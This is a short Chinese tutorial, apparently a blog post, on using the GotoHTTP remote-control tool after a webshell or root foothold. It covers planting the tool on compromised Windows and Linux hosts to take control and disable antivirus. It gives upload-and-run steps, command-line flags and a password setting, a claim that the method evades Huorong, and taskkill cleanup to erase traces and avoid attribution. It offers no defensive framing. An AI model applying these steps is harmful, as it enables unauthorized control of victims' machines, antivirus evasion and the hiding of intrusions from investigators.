前言
在面对杀毒软件阻挡的情况下,如果无法直接使用Webshell获取目标Windows机器的控制权限,可以考虑使用远程控制软件关掉杀毒软件
GotoHTTP远控
软件地址:https://cn.gotohttp.com/
环境:windows 10 有杀软,关闭自带防火墙,使用火绒(亲测可绕火绒那个垃圾,360有限制绕不过去)
windows上线主机
上传gotohttp.exe到目标站点,start GotoHTTP.exe 后生成gotohttp.ini配置文件
打开后就是该配置文件
输入远控id和key
即可连接远控
linux上线主机
上传gotohttp文件,在获取到root权限下,给文件赋予执行权限后,执行命令
sudo ./gotohttp -p 自定义密码 -f 0 -m 1
参数详情
GotoHTTP支持以下参数:
-p <pass> 设置用户密码
-f <1|0> 允许/禁止 文件传输
-m <1|0> 允许/禁止 多人同时控制(不建议使用,降低性能)
-b <1|0> 是否尝试使用Framebuffer模式(不建议使用)
执行后稍等一下,会显示出id和密码
问题思考-实战后续处理
使用gotohttp执行后,在实战中会暴露一些问题
1.默认页面
执行后会直接远程控制,如果有显示锁屏界面,默认如下所示
2.留痕迹
运行后默认桌面会显示ip,容易被溯源
解决方案:当结束工作后,windows后台GotoHTTP进程默认还是启动中,需要清理痕迹关闭进程
taskkill /f /t /im “GotoHTTP.exe”,后续在删除exe文件即可